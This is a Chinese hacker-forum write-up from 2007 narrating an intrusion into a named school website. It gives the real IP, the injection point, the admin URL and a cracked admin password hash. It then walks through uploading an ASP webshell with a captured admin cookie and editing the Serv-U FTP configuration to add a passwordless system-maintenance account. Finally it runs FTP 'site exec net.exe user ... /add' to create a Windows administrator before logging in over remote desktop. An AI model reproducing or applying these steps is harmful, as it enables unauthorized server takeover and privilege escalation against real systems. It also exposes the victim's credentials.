文章来源:C.R.S.T
作者:消失再消失
QQ617595
EMAIL:dj104434497@163.com
个人站点:http://3800hk.cn/blog/djandsj/index.html
=================================================================================
目标:www.hldsyxx.com (http://221.202.112.2该站点已经关闭IIS)
环境:注射点http://221.202.112.2/info_Print.asp?ArticleID=826
物理路径:'E:\syxx-7eee23 000\Inc\database\shenguijuan.asp'
后台地址:http://221.202.112.2/ad_login.asp
管理员密码帐号:
[username] : dangzhibu
[password] : 4e0bab02f87a1d45
[id] : 12
MD5密码:13942932552
以上的猜解过程很简单在此我就忽略不写了.
进入正题
我拿的是普通管理员的权限,高级管理的MD5没跑出来.
我们看下后台如图片1
是动力系统的....
之后我进入到后台如图片2
只有上传图片地址.没有插一句话木马的地方,之后也没备份数据库恢复数据库的功能.
后台编辑器如图片3
如此.
但是我那时候我十分需要这个服务器因为我要进行arp或者嗅探来达到我的最终目的.
后台已经没有其他可以利用的地方了.怎么办?
扫描继续扫描,当你没办法的时候就尝试其他的方法.
拿出明小子扫到有上传点(先开始我也不知道,之后C.R.S.T的朋友们提醒才发现的,看来很多时候要知道变通)
找到上传点
http://221.202.112.2/upfile_info.asp
直接通过明小子上传提示登陆之后在使用此功能.
没办法,只能去后台抓包
找到上传图片的地方打开抓包工具,选择好图片。上传抓包数据.cookie.
(解释:cookie 我就不用解释了吧,不知道的去百度下,我们抓cookie抓的其实是管理员的上传cookie)
拿出明小子找到上传利用那,选择动力上传,cookie里写上抓包抓到的.之后选择动力上传中第2个选项
点上传
:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 29 May 2007 16:41:00 GMT
Content-Length: 847
Content-Type: text/html
Cache-control: private
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body leftmargin="2" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.pasteHTML('<img src="/UploadFiles/20075300410279.gif" align=left border=0>');
parent.parent.AddItem('UploadFiles/20075300410279.gif')
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script><SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.text='[upload=asp ]UploadFiles/20075300410204.asp [/upload]';
parent.parent.AddItem('UploadFiles/20075300410204.asp ')
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script>
</body>
</html>
获得webshell.
接下来没有任何的悬念进入-开始程序 发现有seru.找到该目录发现是6.3版本的.
直接添加用户
[GLOBAL]
Version=6.3.0.1
ProcessID=2376
[DOMAINS]
Domain1=XXX.XXX.XXX.XXX||21|DNS|1|0|0
[Domain1]
User1=admin|1|0
[USER=admin|1]
Password=wk723C8E9712CE93D48C8433639F86B13A
HomeDir=e:\
RelPaths=1
PasswordLastChange=1174022617
TimeOut=600
Access1=E:\|RWAMLCDP
原配置文件 修改提权之后的文件如下
[GLOBAL]
Version=6.3.0.1
ProcessID=2376
[DOMAINS]
Domain1=221.202.112.2||21|DNS|1|0|0
[Domain1]
User1=admin|1|0
User2=didiao|1|0
[USER=admin|1]
Password=wk723C8E9712CE93D48C8433639F86B13A
HomeDir=e:\
RelPaths=1
PasswordLastChange=1174022617
TimeOut=600
Access1=E:\|RWAMLCDP
[USER=didiao|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
ok,我们来用cmd连接ftp
输入.
ftp
ftp open 221.202.112.2
输入帐户didiao
直接登陆(因为密码为空)
之后我们进入
C:\WINDOWS\system32
之后 用quote site exec net.exe user didiao didiao /add
quote site exec net.exe localgroup administrators didiao /add
提权. 最后登陆3389
整个过程就是上述这样. 当然后来回想一下其实有其他的办法可以拿webshell的
因为后台是ewebeditoR编辑器有默认路径的.
注:神无月 和 joli 提供技术支持
(在黑防发了一下,想想和自己一样的菜鸟还有很多,所以就又发布到红狼来了,整理了一下把入侵的过程都写进去了,其实很多是靠神无月和joli指点的,再次感谢!)
当前位置:
